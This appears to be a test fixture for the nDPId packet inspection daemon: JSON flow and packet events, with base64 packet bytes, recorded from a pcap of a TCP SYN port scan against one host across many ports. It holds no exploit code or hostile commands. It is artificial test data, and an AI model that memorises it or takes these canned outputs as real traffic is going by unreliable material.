+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsMeAAACgG7pKsEAAIQA2GNIzSA9XdUoMYAAAAAGACBAAwugAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsvrcAADgGUbusEAAIQA2GNIzSFbjdUoMYAAAAAGACBAAe1wAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAszmQAAC4GTA6sEAAIQA2GNIzSC7\/dUoMYAAAAAGACDAAg0AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAswF0AACkGXxWsEAAIQA2GNIzSBF\/dUoMYAAAAAGACCAAsMAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsVtQAADQGvZ6sEAAIQA2GNIzS2QPdUoMYAAAAAGACBABbiwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsEBMAADUGA2CsEAAIQA2GNIzSDrbdUoMYAAAAAGACCAAh2QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsXHsAADYGtfesEAAIQA2GNIzSBkDdUoMYAAAAAGACDAAmTwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAs5n4AACgGOfSsEAAIQA2GNIzSBKjdUoMYAAAAAGACBAAv5wAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAs2vsAADIGO3esEAAIQA2GNIzSL47dUoMYAAAAAGACDAD9AAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAschMAACoGrF+sEAAIQA2GNIzSK2bdUoMYAAAAAGACDAABKQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsnCkAADcGdUmsEAAIQA2GNIzSOprdUoMYAAAAAGACEADt9AAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAspFoAADUGbxisEAAIQA2GNIzSMDndUoMYAAAAAGACCAAAVgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsF4AAADsG9fKsEAAIQA2GNIzSJvDdUoMYAAAAAGACEAABnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsslAAADkGXSKsEAAIQA2GNIzSB7bdUoMYAAAAAGACCAAo2QAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsyZQAACwGUt6sEAAIQA2GNIzSJqzdUoMYAAAAAGACBAAN4wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsUYgAADkGveqsEAAIQA2GNIzSBIzdUoMYAAAAAGACCAAsAwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsDTcAAC8GDDysEAAIQA2GNIzSA4LdUoMYAAAAAGACEAAlDQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsiQgAACkGlmqsEAAIQA2GNIzSGuHdUoMYAAAAAGACCAAVrgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsouUAADgGbY2sEAAIQA2GNIzShwvdUoMYAAAAAGACBACtgwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAs0KgAACYGUcqsEAAIQA2GNIzSAfTdUoMYAAAAAGACDAAqmwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsyxIAADkGRGCsEAAIQA2GNIzSFADdUoMYAAAAAGACCAAcjwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAslCcAADIGgkusEAAIQA2GNIzSRnjdUoMYAAAAAGACDADmFgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAs1vIAADkGOICsEAAIQA2GNIzSE8TdUoMYAAAAAGACCAAcywAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsmf0AACUGiXWsEAAIQA2GNIzSDkvdUoMYAAAAAGACCAAiRAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAss\/0AACsGaXWsEAAIQA2GNIzSBBvdUoMYAAAAAGACEAAkdAAAAgQFtA=="} 